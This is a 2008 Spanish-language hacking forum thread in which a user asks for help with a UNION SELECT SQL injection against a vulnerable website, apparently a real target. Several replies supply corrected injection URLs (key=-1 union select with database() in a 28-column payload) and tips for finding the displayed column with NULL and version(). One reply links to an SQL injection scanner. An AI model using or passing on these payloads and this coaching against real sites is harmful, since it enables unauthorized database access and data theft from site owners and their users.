elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Problema con UNION SELECT en SQL Injection		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con UNION SELECT en SQL Injection  (Leído 5,427 veces)
Mie2

Desconectado Desconectado

Mensajes: 73


Se Hacker Es la MejoR DEfensas contra Los Atakes


Ver Perfil
Problema con UNION SELECT en SQL Injection
« en: 12 Octubre 2008, 23:55 pm »
bueno mi probemas es que tengo una web vuln me explico

es un ej
site.com/hack.php?key=14800 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

bueno se que la web tiene 28 columna pero cuado hago la inyeccion que seria esta


site.com/hack.php?key=14800 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

me dice los mismo no me da el nombre de la base de datos si no me explique aseto criticas gracias ayuda cual seria la inyeccion correcta o si nesecitan mas info graxx
« Última modificación: 22 Octubre 2008, 17:59 pm por sirdarckcat » En línea
Mie2
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: ayuda con sql iyeccion
« Respuesta #1 en: 13 Octubre 2008, 18:54 pm »
Seguramente no es el campo indicado, cambia los numeros por "NULL" y agrega version(). @@version o now(), solo para saber que campo es el valido. de ahi partes para injectar dependiendo de la base de datos.

-berz3k.
En línea
Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: ayuda con sql iyeccion
« Respuesta #2 en: 18 Octubre 2008, 19:07 pm »
O podes usar el script de Login Root http://eazyrlz.blogspot.com/2008/10/sql-injection-scanner.html
En línea
[/url]
ChElAnO

Desconectado Desconectado

Mensajes: 129


Ver Perfil
Re: ayuda con sql iyeccion
« Respuesta #3 en: 20 Octubre 2008, 07:01 am »

hola, como dijo berz3k  seguro estas usando una columna que no se muestra,
para saber que columnas son mostradas deberias probar

site.com/hack.php?key=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Asi, si en la pagina sale el numero 4 digamos, usa esa columna para poner database()
avisa si funciono,

saludos!
En línea
1nc0d3

Desconectado Desconectado

Mensajes: 8


El Hacking es un arte no es delincuencia!


Ver Perfil
Re: Problema con UNION SELECT en SQL Injection
« Respuesta #4 en: 29 Octubre 2008, 02:02 am »
Yo creo que has hecho mal en la injeccion :S



site.com/hack.php?key=-1+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*


Prueba asi y nos avisas si te resulta =]

Espero te haya servido!
« Última modificación: 29 Octubre 2008, 21:21 pm por 1nc0d3 » En línea
1nc0d3! un hacker juega Callado!!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con una union (sql injection)
Nivel Web 		4rkn63l 0 3,098 Último mensaje 12 Febrero 2011, 02:21 am
por 4rkn63l
Union Based Sql Injection
Nivel Web 		Stuxnet 5 5,490 Último mensaje 9 Febrero 2015, 13:08 pm
por Shell Root
Problema con <Select> Wordpress y Chrome
Desarrollo Web 		Maurice_Lupin 2 2,151 Último mensaje 2 Febrero 2015, 21:58 pm
por Maurice_Lupin
Not Acceptable!, problema en ejercicios de injection SQL
Hacking 		Caroxh1 4 3,471 Último mensaje 5 Febrero 2020, 17:32 pm
por WHK
Problema en ASP.NET Razor Pages Select asp-items
.NET (C#, VB.NET, ASP) 		Albpous 1 2,847 Último mensaje 17 Febrero 2024, 16:02 pm
por TickTack
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines